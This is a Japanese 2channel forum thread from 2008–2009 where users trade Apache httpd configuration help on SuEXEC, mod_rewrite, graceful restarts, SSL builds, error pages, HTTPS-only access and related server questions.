1 :名無しさん@お腹いっぱい。2008/09/30(火) 08:11:00
HTTP ServerのApacheに関する話題を扱うスレッドです。
http://httpd.apache.org/

●インストール済みApacheの詳細情報の調べ方
httpd -h 簡易ヘルプ
httpd -v バージョン情報
httpd -V コンパイル条件など詳細な情報
httpd -l 静的リンクされたモジュール一覧
httpd -M 現在の設定ファイルで読み込まれるモジュール(2.2以降)

●公式マニュアル
http://httpd.apache.org/docs/1.3/ Apache 1.3
http://httpd.apache.org/docs/2.0/ Apache 2.0
http://httpd.apache.org/docs/2.2/ Apache 2.2

●ディレクティブ一覧
http://httpd.apache.org/docs/1.3/mod/directives.html
http://httpd.apache.org/docs/2.0/mod/quickreference.html
http://httpd.apache.org/docs/2.2/mod/quickreference.html

前スレッド
Apache関連 Part10
http://pc11.2ch.net/test/read.cgi/unix/1179627714/
4 :名無しさん@お腹いっぱい。2008/10/02(木) 08:39:06
>>1
5 :名無しさん@お腹いっぱい。2008/10/07(火) 20:19:39
自宅鯖の質問スレで質問した際、こちらのほうが適切な回答がとのことでしたので質問させてください。

Apache2.2.8でVirtualHost+SuEXECな環境を作りたいのです。
Apacheはuserもgroupもnobodyで動かしています。
そのためMovableTypeでHTML生成すると、ファイルのオーナーがnobodyになってしまい
これはSuEXECなるものを使えってことなのか?と試しているんですが、どうやってもnobodyでファイルが生成されてしまうのです。
/home/[ユーザ名]/public_htmlがVirtualHost個々のDocumentRootです。

./configure --prefix=/usr/local/apache2 \
--enable-so \
--enable-rule=SHARED_CORE \
--enable-rewrite \
--disable-dav \
--enable-cgi \
--with-included-apr \
--with-perl=/usr/local/bin/perl5.8.8 \
--with-port=80 \
--enable-suexec \
--with-suexec-caller=nobody \
--with-suexec-docroot=/home \
--with-suexec-userdir=public_html \
--with-suexec-bin=/usr/local/apache2/bin/suexec \
--with-suexec-logfile=/usr/local/apache2/logs/suexec_log \
--with-suexec-uidmin=1000 \
--with-suexec-gidmin=1000

configureは上記のようにしていますが、httpd_vhostとかに何かおまじないを書く必要があるんでしょうか?
もしくは他の方法でユーザ自身がオーナーになるようにできるんでしょうか?
初心者的質問で恐縮ですが、よろしくお願いします。
6 :名無しさん@お腹いっぱい。2008/10/07(火) 21:49:42
>>5
/usr/local/apache2/logs/suexec_log に何かでてないの?
7 :52008/10/07(火) 22:52:34
ログには何も書き出されないです。
suexec -Vではconfigureの値がでてきているので
入っているのは確認できているんですが・・・

9 :名無しさん@お腹いっぱい。2008/10/07(火) 23:12:46
補足

>>7
> ログには何も書き出されないです。

ログが出ないことからしても、SuEXECなアクセスとして扱われてな
い可能性が高い気がするなぁ。マニュアルに SuEXEC としてアクセ
スするための条件とか書いてない?
162 :名無しさん@お腹いっぱい。2009/04/16(木) 16:31:47
ここの管理人はこちらが正当な理由でルールに乗っ取り削除依頼だしているにもかかわらず、都合が悪いと

IPアドレスを抜き取って接続拒否する手段をとるようですねえ?最低な管理人様ですね。

それとも私の勘違いかな、サーバーに不具合でもあるのでしょうか?特定の人間だけを接続不可能にするような不具合でも?それなら早く直して頂きたいものですね。

Apache 2 Test Pagepowered by CentOS

こんな表示画面に飛ばされるのですが???

まあきちんと削除して下さいな。利用規約にもきちんと明記があるわけですから禁止行為>・第三者の権利を侵害する可能性のあるファイルをアップロードすること。
むしろありがたいと思ってもらいたいですね、犯罪の片棒担ぐのを未然に防げるんですから。


[8] 名前:管理人★ :2009/04/15 (水) 03:35 No.346
>>7
削除完了
※ご自分のPC環境をお確かめ下さい。
ココはアクセスの仕方やパスの解き方などなど...を教えてあげる所ではありません。('A`)

これってさこっちの環境じゃないでしょ?
馬鹿な管理人がムカツイテ特定のIP拒否してるんだけだよね?
8 :名無しさん@お腹いっぱい。2008/10/07(火) 23:09:55
ふむ。
あれ?
> /home/[ユーザ名]/public_htmlがVirtualHost個々のDocumentRootです。
これってちょっと特殊な要件だね。すまん、見逃してた。

<VirtualHost *:80>
DocumentRoot "/home/foo/public_html"
ServerName foo.example.com
</VirtualHost>

って感じ?だとすると、たぶん SuEXEC としては UserDir としての
アクセスじゃないから動かないと思う。(確かめたわけじゃないが、
かなり厳密に動作環境をチェックしてたはずなので)

おおもとのホスト名が www.example.com だとして、
まず http://www.example.com/~foo/ で SuEXEC での動作を確認し
て、http://foo.example.com/http://www.example.com/~foo/
にリダイレクトなり ProxyPass & ProxyPassReverse なりしてやる
のがいいんでない?

注意点としては・・・
・本当にできるかどうかわからんw
・規模が大きくなるとパフォーマンスでないかもしれん
・ProxyPass つかうと VirtualHost側に想定するログが出ないかも
(全部アクセス元が127.0.0.1とか)
・同様にIPアドレスベースでアクセス制御考えてる場合は破綻するかも
などなど。まぁがんがれ。
11 :名無しさん@お腹いっぱい。2008/10/07(火) 23:34:45
>>10
> SuexecUserGroup
おお、これかw
http://httpd.apache.org/docs/2.2/suexec.html#usage

>>5
>>8 は忘れていいw
10 :名無しさん@お腹いっぱい。2008/10/07(火) 23:24:31
SuexecUserGroup
12 :52008/10/07(火) 23:45:49
うおおおおおおおおお!ありがとうございます!
まーさーにー、これだ!
というか、documentはスミからスミまで読みますスミマセンでした。

もうできなくてできなくて、仮想サーバを立ち上げてやろうかとか考えてました。
13 :52008/10/08(水) 10:07:14
一応、結果報告

できました!
まぁお約束のdirectory is writable by othersが出て、一瞬なんでよ?と
思いましたが、そりゃOtherが触れたらsuexec意味ねーじゃんと言うことで
755にして解決です。

ありがとうございました。
14 :名無しさん@お腹いっぱい。2008/10/08(水) 21:37:29
mod_rewriteの[L]の動作について、質問させてください。

jpgはミラーサーバーへ飛ばして、xjpgはサーバー内のjpgを表示したいのですが、

RewriteRule ^(.+)\.xjpg$ /images/$1.jpg [L]
RewriteRule ^(.+)\.jpg$ http://www.mirror.xxx/images/$1.jpg

とやったら2行目まで処理されました。
[L]て、それ以上書き換えルールを適用しないおまじないじゃないんでしょうか。

xjpgはミラーになかったときに突っ返えされたやつなんで無限リダイレクト・・・
15 :名無しさん@お腹いっぱい。2008/10/09(木) 12:36:28
レス付かないようだから素人から。

使わないから曖昧な知識なんだけど、リクエストされたURLパスと物理的な
実ファイルを紐付ける前に、リクエストのパスを書き換えるモジュールだよね?
ってことは、
xjpgでのリクエストはRewriteRule ^(.+)\.xjpg$ /images/$1.jpgに変換して
リクエストを処理。
変換されたリクエストはRewriteRule ^(.+)\.jpg$の条件にマッチするので
ミラーにないからxjpg突っ返されて無限リダイレクト。

1回のリクエストで2行目まで処理されてるんじゃなくて
都合2回分のリクエストが発生したため、2行目まで処理されてるって
ことになってるんじゃないかと素人は思う。
16 :142008/10/09(木) 19:36:52
いやあ、そうならないように [L] をつけたわけで、
なのに評価が止まらないので質問しました。



でも自己解決したので報告します。
.htaccessでやってたからダメでした。httpd.confに移したらOK。

.htaccessだと、[L]でとめた後にまたディレクトリを読み込んで評価しちゃうんですね。


18 :名無しさん@お腹いっぱい。2008/10/10(金) 18:40:38
logresolve がまともに動かないんだが、
logresolve は、どのDNSを使っているのか?
設定するファイルも無いようなんだが。

そもそも、パソコンが使うDNSとは
一意に決まっているのか?

それはどこに設定されているの?
21 :名無しさん@お腹いっぱい。2008/10/13(月) 18:30:35
マニュアルを調べたのですが自信がないので教えてください。

Allowoverride で Fileinfoを許可したいが、
CGIやPHP、SSI
を使用させたくない、というポリシーです。

phpに関してモジュールの使用を禁止するのは
モジュール自体をoffにするしか事実上不可、であってるでしょうか?

またCGI,SSIについては
optionsを禁止しておけば、Fileinfoが使えても使用できない、
ということであってるでしょうか?
22 :名無しさん@お腹いっぱい。2008/10/13(月) 20:37:44
23 :名無しさん@お腹いっぱい。2008/10/14(火) 01:44:25
>>22
wとかつけてるが、全然お前理解できてないだろw
Common_Gateway_Interface って覚えたてで使いたいのか?
26 :名無しさん@お腹いっぱい。2008/10/29(水) 03:09:26
Ubuntu8でApache2を使用しています。

現在、Nameベースのバーチャルホスト設定して
異なるドメインのサイトを2つ運用しているのですが、
今度ここにもう一つサイトを追加することになりました。

そこで質問なのですが、Apacheを再起動せずに
バーチャルホストの設定を追加することは可能でしょうか?

目的は運用中のサイトを停止させずに新規サイトを追加することなので、
バーチャルホスト以外のやり方があるならばそれでも構いません。

何か良い方法があればご教示ください。
27 :名無しさん@お腹いっぱい。2008/10/29(水) 07:20:00
graceful もだめなの?
29 :262008/10/29(水) 15:21:35
>>27-28
どうもありがとうございます。
やはりgracefulが最善でしょうか。

さすがに別プロセスであげると管理がややこしくなるので
深夜などを狙ってgracefulで再起動することにします。
ありがとうございました。
28 :名無しさん@お腹いっぱい。2008/10/29(水) 10:54:01
別プロセスで上げる、とか。

つーかさ、止めちゃだめなような作りにするなよ。
障害で落ちることもあるんだから。
30 :名無しさん@お腹いっぱい。2008/10/29(水) 19:46:26
そういう用途のための graceful だからな。しっかし、再起動でも問題ないだろ
一瞬でも止められないサイトなら鯖を二重化するなりしとけw
31 :名無しさん@お腹いっぱい。2008/11/01(土) 00:36:09
graceful-stop → start
ただのgracefulよりすっきりする
ただし忙しいサーバーだとstartのときに、bind出来ないって怒られることがある(バグ)
35 :名無しさん@お腹いっぱい。2008/11/01(土) 19:41:47
>>31
ちょとまて、bind出来ないってそれマジか?
OSは?Apacheのバージョンは?
32 :名無しさん@お腹いっぱい。2008/11/01(土) 00:43:28
mod_rewriteを<Directory>や.htaccessに入れるのは上級者向けなのに
初心者ほどやりたがるから困る
33 :名無しさん@お腹いっぱい。2008/11/01(土) 08:42:39
Apacheのことが何でも載ってる、Apacheを極めたい人の究極の一冊となるとどんな本がお勧めですか?
36 :名無しさん@お腹いっぱい。2008/11/01(土) 20:48:14
apacheにsslを組み込んでインストールがしたいので、本の通り下記のコマンドを実行しました。
./configure --enable-rewrite=shared --enable-ssl=shared --prefix=/opt/www

するとエラーが出てきました。
configure: error: ... Error, SSL/TLS libraries were missing or unusable

解決策があれば教えてほしいです。
38 :名無しさん@お腹いっぱい。2008/11/02(日) 00:25:50
>>36
書いてあるとおりでしょ。
39 :名無しさん@お腹いっぱい。2008/11/02(日) 08:47:51
>>36
ライブラリが見つけれないのかなと思って、/etc/ld.so.confにsslの
ライブラリがある場所を追記したんですけど、余り関係ないですか?

どなたかヒントをお願いします。
40 :名無しさん@お腹いっぱい。2008/11/02(日) 11:02:58
>>36
openssl関連が入ってないんじゃないの?

たとえば・・・
http://oku.edu.mie-u.ac.jp/~okumura/linux/?Apache%202#m73dd07e

OSはなに?
linuxならわざわざソースから入れないでパッケージ使えば楽ジャン。
apt使用できるなら依存関係も含めてインストールしてくれるし( ・∀・)イイ!!
42 :名無しさん@お腹いっぱい。2008/11/02(日) 16:11:54
>>40
openssl-develが入っていなかったぽいです。
インストール後、configureはできたんですけど、
今度はmakeで引っかかってしまいました・・・。

一旦ソースからのインストールはあきらめて、aptでやり直してみます。
アドバイスどもでした。
37 :352008/11/01(土) 21:12:52
あぁ、ごめん
graceful-stop → start ね
タイミングによってはなるかもだね
graceful で起きるのかと勘違いしたw
44 :名無しさん@お腹いっぱい。2008/11/09(日) 06:00:44
errordocument ディレクティブを使用せずに
元のエラードキュメントを変更する方法はないでしょうか?
ドキュメントルート以下にエラードキュメントを置けず、
またhttp://でのURL指定も避けたいためです。

標準で表示されるエラードキュメント(たとえば、404 not foundとか)
は.htmlでどこかにデータがあるわけではなく、
apacheのソース自体に書き込まれてるのでしょうか?
47 :名無しさん@お腹いっぱい。2008/11/10(月) 00:55:14
>>44
Apache 2.xのサンプル設定にある多言語表示用のErrorDocumentと
その前に置かれているAlias /error/を見れば解決方法はわかるよな?
48 :名無しさん@お腹いっぱい。2008/11/10(月) 02:14:19
ドキュメントルート以下にエラードキュメントを
置けないという状況がまず理解できない
49 :442008/11/10(月) 19:23:37
httpd.confでデフォルトで記述してある
Aalias /error/ をコメントアウトしても
表示変わりません、
ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
自体をコメントアウトしても
表示されるエラーって
ソース以外どこに書いてあるのを読み込んできているんでしょうか。
50 :名無しさん@お腹いっぱい。2008/11/10(月) 20:12:31
DocumentRoot外にエラーページを配置する方法はわかっただろ
なのに何が問題なんだ?

訊きたいことをちゃんとまとめてから来るんだね
53 :名無しさん@お腹いっぱい。2008/11/10(月) 22:27:09
ieは自前のエラーメッセージを出す仕様

ってエスパーしてみる
正確にはリクエストのサイズとか
いくつか条件有ったと思うけど
54 :名無しさん@お腹いっぱい。2008/11/10(月) 23:23:45
[HOWTO] Internet Explorer 5.x および 6.x の "HTTP エラー メッセージの簡易表示" 機能をサーバー側で無効にする方法
http://support.microsoft.com/?scid=kb%3Bja%3B294807&x=19&y=7
55 :名無しさん@お腹いっぱい。2008/11/10(月) 23:35:11
>>54
久々に笑える仕様だなあ。
56 :名無しさん@お腹いっぱい。2008/11/11(火) 01:07:49
そりゃ有名な仕様だよ

そっけなく表示される短文のエラーメッセージを
わかりやすくしようと考えたんだろうね

Internet Explorerはそういういらぬお節介が多い
時としてContent-Typeを無視するのも同じことかと

ボクが考えた親切設計〜☆とかいうのはよく吟味しないと
迷惑をかけたりヘタすりゃ脆弱性になったりもする
サービス精神が豊かすぎるつーか余計なことが大好きな人は
そういうことになってないか確認を忘れずに
58 :名無しさん@お腹いっぱい。2008/11/11(火) 14:27:03
ケータイで web を見るときもサーバからのエラーページを
そのまま見せるものは皆無なわけだし、
IE の仕様が超絶的におかしいというわけでもないよ。

メーラーだって、550 relay denied というエラーで蹴られたとしても、
そのエラーは画面に出さずに「送れませんでした」とダイアログを
出すようなものが多いでしょ。それと同じ。

エラーページのサイズで挙動を変えるというのは変態だが。
59 :名無しさん@お腹いっぱい。2008/11/17(月) 21:32:33
サイトごとの負荷を調べたいのですが、何か良いツールはありますか?

バーチャルホストで10サイトほど運営しています
通常のアクセスログをサイト毎に存在します
こういう場合はサイト毎にWebalizeでも使うのでしょうか
60 :名無しさん@お腹いっぱい。2008/11/18(火) 14:14:42
負荷ってトラフィック的かCPU的かメモリ的か同時アクセス的か等によって変わるよ、
例えば単純な大データ転送より細かなCGIプログラム処理の方がサーバ&環境にとって負荷が高いって事も多いし、

まず何を目的に負荷の調査をしたいのかがわからないとね。
62 :592008/11/18(火) 15:40:01
回答ありがとうございます。

サイト毎のCPU的な負荷を知りたいです。
サイト毎の load average のような。

そういったツールってありますかね?
64 :名無しさん@お腹いっぱい。2008/11/18(火) 15:47:13
使用するリソースってバーチャルホストごとに明確に分離してるわけじゃないよ。
複数のサイトで共有して使われてるものもあるから、
そういう負荷状況を取得するのは無理。

どうしてもそういうのが欲しいのなら、バーチャルホストごとに
別プロセスで立ち上げること。名前ベースなら無理だけど。
65 :592008/11/18(火) 15:59:38
>>64
なるほど、そう考えるとそうですね
ありがとうございます

ただ、一つだけ合点がいかない部分がありますので聞かせてください

レンタル鯖の xreaって、サイト毎に load average っぽいのが見られるじゃないですか
1以上が長い時間続くとサーバー停止みたいな
あれって apache + virtualhost で 名前ベースだと思うのですが、
どのように実現しているんですかね
66 :名無しさん@お腹いっぱい。2008/11/18(火) 16:02:51
>>65
どこで見れんの?
68 :名無しさん@お腹いっぱい。2008/11/18(火) 17:43:30
>>64
自分もCGIの多いサイトを運営してるけどこれ一本でOK的なツールは知らない、(誰か知ってたらおしえて)
でどうしてるかというと
MRTG(snmp)でCPUとトラフィックのロードアベレージを取っていて気になる時間帯のログを分析して割り出してる
効率の良い方法とは言えないけどこれで負荷が高いサイトやCGIは有る程度特定できる。
67 :名無しさん@お腹いっぱい。2008/11/18(火) 16:52:59
XREAが出してる「負荷率」はCGI。
CGIWRAP使ってなんかしてるんだと思うけど俺はCGIWRAPはよくわからん。
それとアクセス数と転送良だな。
69 :名無しさん@お腹いっぱい。2008/11/19(水) 00:04:58
CGIだけだったら、/usr/bin/perl をラッパーにして、
なんか記録撮るプログラム挟めば行けそう
71 :名無しさん@お腹いっぱい。2008/11/21(金) 03:38:03
CGIなら、suEXEC使ってユーザ毎に分ければ
何となく制限とか簡単そうな気がする
73 :名無しさん@お腹いっぱい。2008/12/03(水) 09:06:54
レン鯖のことはよくわからないけど
PHP/CGIラッパーつかってるなら実行権限はapacheやnobodyじゃなくてユーザーなわけでしょ?
なら普通に60秒ごとにでもpsのpcpuを監視するスクリプトでも書けば実現できるんじゃない?
75 :名無しさん@お腹いっぱい。2008/12/07(日) 17:31:36
Apache 2.3.0-alpha がそろそろ出るぞ
アルファだけあってまだまだ変なとこもあるけど
安定した追加機能もあったりする
76 :名無しさん@お腹いっぱい。2008/12/09(火) 09:51:20
スレ違いすまん。

海外に、web server の履歴(OSやらServer) を調べられるサイトが
あったと記憶しているんだが、名前が分らない。

どなたか教えてくださいませ。
78 :名無しさん@お腹いっぱい。2008/12/14(日) 16:33:11
httpd.conf を再読み込みするときに
kill -HUP をしているのですが、
ブラウザからCGIなどの処理中の場合、
CGIの処理が中断され終了してしまうことを確認しました。

これを回避する方法ってないでしょうか?
82 :名無しさん@お腹いっぱい。2008/12/15(月) 22:10:59
httpsのみでアクセスさせたいページがあるのですが、
mod_rewriteをいじってもうまくいきません。

セキュリティの対策として行なおうとしてますが、
一般的に、こうしたことはする必要ないのでしょうか?
83 :名無しさん@お腹いっぱい。2008/12/15(月) 22:24:08
環境変数SERVER_PORTが443じゃなかったら弾く。
mod_rewriteでもmod_setenvifでも出来るよ、多分。
84 :822008/12/15(月) 22:30:29
>>83
あ、環境変数で弾けばよかったんですね。
やってみます。ありがとうございました!
85 :名無しさん@お腹いっぱい。2008/12/15(月) 22:35:00
環境変数なんて見なくても、ポート80のほうのバーチャルホストではじけばいいだろ
てか弾くんじゃなくてHTTPSのほうにリダイレクトすりゃ親切だけどな
86 :名無しさん@お腹いっぱい。2008/12/15(月) 22:40:09
同一ホストだが、特定のディレクトリだけはSSLに限定したいって要件を前提で回答した。
リダイレクトすりゃ親切ってのは同意。
87 :名無しさん@お腹いっぱい。2008/12/16(火) 21:57:24
Apache2.0.63でAuthDBMUserFileを使って認証ファイルをDBM形式にしたいのですが
--enable-auth-dbm
をつけてconfigureすると、環境によってデフォルトがSDBM、NDBM、GDBMなど 使える
DBMのうちのどれかになるそうです。
http://httpd.apache.org/docs/2.0/ja/mod/mod_auth_dbm.html#authdbmtype

デフォルトを、たとえばGDBMにしたい、という場合はconfigureでどういうオプションをつける
のでしょうか?

AuthDBMType GDBM
とするとGDBMが使えるのは知っています。

「デフォルトをGDBMにしたい」というのはただの興味で、自分の環境のCentOS5.2だとSDBMが
デフォルトになったので、なんでかな?という理由です。
88 :名無しさん@お腹いっぱい。2008/12/17(水) 01:00:36
97 :名無しさん@お腹いっぱい。2008/12/17(水) 22:07:21
>>88

./configure --help
と同じ内容ですよね。

で、そこのどこに「デフォルトDBMを指定するには」があるんでしょ?

関係ありそうなのは
 --enable-auth-dbm
 --with-gdbm[=path]
 --with-ndbm[=path]
 --with-berkeley-db[=path]
だけかと思うのだけど。
89 :名無しさん@お腹いっぱい。2008/12/17(水) 07:50:29
AサーバからBサーバへIPアドレス変更した対策として
Aに来たアクセスをそのまま
Bへ送る、みたいなことってできないでしょうか?
自サイトにアクセスがあったらWEBプログラムで
ローカルのデータベースに書き込む仕組みのため
IP変更で一時でも情報が分散するのが困るためです。

メールサーバー(postfix)はクリアできたのですが、
ウェブサーバー(apache)は方法がさっぱり分かりません
94 :名無しさん@お腹いっぱい。2008/12/17(水) 14:53:19
>>89
当面サーバAを止めずにアクセスをリダイレクトするのは?
サーバBへはhttp://1111.2222.3333.4444/
って感じでIPアドレスベースで。

その程度のライトな対応はよくやる。
90 :名無しさん@お腹いっぱい。2008/12/17(水) 08:02:20
DNSのAレコードを修正したってこと?
メールは中継すればいいけど、Webはなぁ・・・w
91 :名無しさん@お腹いっぱい。2008/12/17(水) 08:07:30
Webサーバーレベルではどうしようもないな。
BにAのIPアドレスを、ARPに反応しないような方法で割り当てればいい。
92 :名無しさん@お腹いっぱい。2008/12/17(水) 08:16:07
経緯がよう分からんが、TTLを300secぐらいに小さくしておいて移行期間を少しでも短くするとか.。
古いアドレスの方は完全に止めてしまえば、そっちにアクセスされてデータがおかしくなることもない。
無理にシームレス化させなくて、割り切った方がいんでは?
93 :名無しさん@お腹いっぱい。2008/12/17(水) 13:47:11
iptables なり pf なりでパケット転送すればいいんでね。
要はグローバル-プライベートじゃなくてグローバル-グローバルの NAT。
96 :912008/12/17(水) 21:21:12
読み返してみると俺は何を書いてるんだ…
要するに>>93みたいな事を言いたかった
98 :名無しさん@お腹いっぱい。2009/01/07(水) 17:02:56
検索してたら、サービスとして起動しているものをコマンドで停めるのはNGっぽいことを書いてる人がいたけど、そういうもん?
VMwareで自動起動したtomcatがstopできないんだけど…
99 :名無しさん@お腹いっぱい。2009/01/07(水) 19:40:16
>>98
どういうこと?
100 :名無しさん@お腹いっぱい。2009/01/08(木) 09:28:50
>>99
chkconfigで2〜5がONになってて起動中のTOMCATを、/etc/init.d/tomcat stopで停めようとすると、サーバ(VMware?)がハングする
でもってchkconfigでtomcatの2〜5までOFFにすると、/etc/init.d/tomcat stopで停まる

VMwareが他の人のPCに入ってるので、その人が来るまでまだしばらく各種バージョンは確認できないんですけど。

tomcatが悪いのか、mod_jkが悪いのか、JAVAが問題なのか、はたまたVMの問題か、原因がよく判らないんですよねぇ…
101 :名無しさん@お腹いっぱい。2009/01/09(金) 22:48:04
>>100

罠として仕掛けるには面白いから、どうしてサーバがハングするのか突き止めてくれw

自分の知識ではその状況が作り出せない・・・
102 :名無しさん@お腹いっぱい。2009/01/10(土) 02:19:25
すみません。
ご存知の方がおいででしたら、教えていただきたいのですが、
apache(1.33以上)の動作として、
HEADメソッドのリクエストに対して、100 Continueを返す
ことはあるのでしょうか?

というかごくまれに返ってくると思われるのですが、
どういった条件で返すのでしょうか?
104 :名無しさん@お腹いっぱい。2009/01/10(土) 17:47:19
windows 2k(SP4)で apache 2.2.9を使っていますが、
ファイルの転送が遅く、色々試行錯誤しております。
LAN(一応Gbit)内に置いてあるのですが、400KB/sec程となってしまいます。

お知恵を拝借したく、書き込みいたします。

FTPでは12MB/secとなります。
複数からの接続をすると、200KB/secずつになります。
CPUの負荷には変化なく、十分に余裕があるように見えます。
ProcessExplorerでディスクへのアクセスの仕方を見てみましたが、
400KB/secで安定して読み込み、変動はありません。
そのため負荷による制限ではなく、意図的な制限に見えます。

当初、EnableSendfile off にて、11MB/secになって安心していたのですが
数日後、400KB/secに戻ってしまいました。

sendbuffersize にRWINと同じ値を指定し、11MB/secとなり、
様子を見ておりましたが、再度400KB/secになってしまいました。

今回は、的外れと思いつつwindows側のTCPがらみの調整を行いましたが、改善しませんでした。
帯域制限をするモジュールや、ファイアーウォールの類はありませんので
apacheとwindows間のやり取りに何らかの障害が発生している?と思うのですが…
現象の再発性が腑に落ちません。
根本的な問題が別にあるのでしょうか…(例えばメモリーなどのHW? 無いか…)

どなたか、「これやった?」的なアドバイスが頂ければ幸甚です。
106 :名無しさん@お腹いっぱい。2009/01/17(土) 13:45:01
特定のIPアドレスからのアクセスを制限したいのだが、denyとかじゃなくてコネクションの
頭から弾くようなものは無いですかね。。。

まちBBSの「Proxyと思われるポートが開いています」対策なんですけど、ルータや
IPマスカレードのレベルで実施するというのもごもっともなんですが、できればお気軽
にApacheの設定だけでできないかな、と。
109 :名無しさん@お腹いっぱい。2009/01/18(日) 16:03:40
acceptしてすぐ切断するモジュールなら作れるけど、accept自体を拒否することはできない
110 :名無しさん@お腹いっぱい。2009/01/19(月) 15:21:24
CLOSE_WAIT が  残ってしまう 現象って、ググってもわかりません。

エロイ人教えてくださいませ。よろしくお願いします
111 :名無しさん@お腹いっぱい。2009/01/19(月) 22:59:01
>>110
まったく、OS とか環境が無いとアドバイスのしようが無いじゃないの!
とりあえず、Linux なら Keepalive timeout を短くしてみたら!

べ・・・別に、あんたのためじゃないんだからね。
113 :名無しさん@お腹いっぱい。2009/01/21(水) 04:06:32
>>111
ごめんなさい。遅れまして。OS:CentOS4.7/5 Apache 2.2.8/2.2.11 Tomcat 5.5   mod_jk, mod_proxy
lsof コマンドで確認したこと

(1) ブラウザ  −> Apache
           省略
   CLOSE_WAIT FIN_WAIT2
        両方も開放
(2)ブラウザ  −> tomcat:8080
          省略
   CLOSE_WAIT 速く開放されて表示されない
        両方も開放
(3)ブラウザ  −> Apache Apache−> tomcat:8009
           省略
   CLOSE_WAIT FIN_WAIT2 CLOSE_WAIT 速く開放されて表示されない
        両方も開放          CLOSE_WAIT

connectionTimeoutを設定しないと(0) ESTABLISEDのまま
ご指摘の時間を短くするのは、CLOSE_WAITに至る時間です。
以上です。よろしくお願いします。
112 :名無しさん@お腹いっぱい。2009/01/20(火) 08:38:26
残ると何かマズいの?
114 :1102009/01/21(水) 04:10:42
↑は>>110です。ごめんなさい。

>>112
え、だってリソース開放していないじゃないですか?
115 :1102009/01/21(水) 05:20:21
ごめんなさい。

tomcat へ移動します。

こちらはクローズします。
116 :名無しさん@お腹いっぱい。2009/01/29(木) 20:45:50
ttp://httpd.apache.org/docs/2.2/ja/logs.html
> Apache がログファイルを書いているディレクトリに書き込める人は、
> ほぼ確実にサーバが起動された uid へのアクセスを手に入れることができます。

これ具体的な事例、誰か教えてくれ
言いたいことはわかるんだけど、実際になぜ危険なのかが分かんない
117 :名無しさん@お腹いっぱい。2009/01/29(木) 22:23:28
>>116
http://httpd.apache.org/docs/2.2/en/misc/security_tips.html

If the logs directory is writeable (by a non-root user), someone could replace a log file
with a symlink to some other system file, and then root might overwrite that file with arbitrary data.
118 :名無しさん@お腹いっぱい。2009/01/30(金) 12:34:22
>>117
とてもわかりやすいな。
119 :名無しさん@お腹いっぱい。2009/01/30(金) 22:21:27
>>117
なるほど。考えたこともなかった。
124 :名無しさん@お腹いっぱい。2009/02/04(水) 20:38:29
>>117
昔からUNIX使ってる人はsymlinkアタックなんざ知ってるし、
そもそもログディレクトリに書き込める設定がおかしいw
120 :名無しさん@お腹いっぱい。2009/02/02(月) 02:10:10
<Directory /home/hoge>
Order Deny,Allow
Deny from all
Allow from example.jp
</Directory>

<Directory /home/hoge>
Order Deny,Allow
Deny from all
Allow from example.com
</Directory>

みたいな書き方で、example.com, example.jp 双方から
/home/hogeへのアクセスを許可することは動作上はOKみたいなんですが、
これって正式に認められてる書き方なんるんでしょうか?
121 :名無しさん@お腹いっぱい。2009/02/02(月) 02:20:22
<Directory /home/hoge>
Order Deny,Allow
Deny from all
Allow from example.jp
Order Deny,Allow
Deny from all
Allow from example.com
</Directory>

こう書いたのと等価で、さらに

<Directory /home/hoge>
Order Deny,Allow
Deny from all
Allow from example.jp
Allow from example.com
</Directory>

こう書いたのと等価だからね
正式には知らん
122 :名無しさん@お腹いっぱい。2009/02/04(水) 19:45:21
VirtualHostで
CustomLog "|/usr/local/apache/bin/rotatelogs /home/hoge/logs/hoge.com-access_log.%Y%m%d 86400 540" combined env=!worm

とするとプロセスが
/usr/local/apache/bin/rotatelogs /home/hoge/logs/hoge.com-error_log.%Y%m%d 604800 540

でなく
/bin/sh -c /usr/local/apache/bin/rotatelogs /home/hoge/logs/hoge.com-error_log.%Y%m%d 604800 540
^^^^^^^^^^って頭に/bin/sh -cがくるんだけどこれって正常?
マシンによってまちまち・・・
125 :名無しさん@お腹いっぱい。2009/02/04(水) 20:40:10
>>122
先頭にexecつけてみたら消えない?
昔、特定のバージョンでそういうのあって、execで逃げてた。
127 :1222009/02/04(水) 21:28:12
>>125
おおお。消えました。どもです。
apache_1.3.41+FreeBSD6.3なんですが、
apache_1.3.41+FreeBSD6.2だとexec無しで動いてます。
どういう理屈か追っかけてませんが、一応ご報告。
126 :名無しさん@お腹いっぱい。2009/02/04(水) 20:58:42
sh を仲介させないと rotatelogs じゃなくて "rotatelogs /home/hoge/..." という
空白入りのコマンドを実行しようとしてコケそうな気が。
128 :fa2009/02/13(金) 21:45:22
ふとした時にnetstat で見ると、子プロセスがListenになっているですが、これは正常でしょうか?
私の認識だと、設定したポートにたいして、常に親がListen状態で、forkされた子プロセスはESTABLISHになると思っています。 
プロセス自体を再起動すると、認識どおりの動きをするのですが、何日か稼働させると、子プロセスがListen状態になってしまいます。
ただし、この状態になっても、アクセスは正常に出来、ログにエラーも出ていません。
130 :名無しさん@お腹いっぱい。2009/02/13(金) 23:56:27
tomcat初心者です。
HP-UXにtomcatをインストールしてサーバ構築しています。
tomcatの起動ユーザーをroot以外のユーザーに設定して使いたいのですが、
うまく設定できずに困っております。
rootでtomcatを起動した場合は正常にページが表示できているのですが、
root以外のユーザーで起動するとページが見つかりませんと表示されてしまいます。
尚、catalina.outには以下のログがでておりました。

org.apache.coyote.http11.Http11Protocaol start
致命的:エンドポイントを起動中のエラーです。
java.net.BindException:パーミッションがありません(errno:13)<null>:80

これを見ると、どこかパーミッションを変えないとだめかと考えますが、
具体的にどこを変えていいのか分かっておりません。

ちなみに、/opt/hpws/tomcat配下のパーミッションは
起動ユーザーのもの(オーナーやグループ)に変えております。

問題がお分かりの方ご教授ください。


設定としては以下
・/opt/hpws/tomcat配下の権限(オーナー、グループ)は、起動ユーザーのもの。

131 :名無しさん@お腹いっぱい。2009/02/15(日) 13:36:58
mod_headersってAuthorizationヘッダ消せないのかね?
apahe2.2.6 + CentOS4.6でやってみたけどどうにも消えない。。。
136 :名無しさん@お腹いっぱい。2009/02/17(火) 01:14:08
「ログアウト」を踏んだときに

HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="hello"

というレスポンスをサーバーが返せば、
大抵のブラウザはログアウト状態になるよ。
137 :名無しさん@お腹いっぱい。2009/02/18(水) 08:36:53
>>136
その後リトライさせるとパスワード覚えてて意味なしだけどな。
138 :名無しさん@お腹いっぱい。2009/02/25(水) 00:44:33
前任者がさくっと辞めた後、パソコン詳しそうだからという理由で、
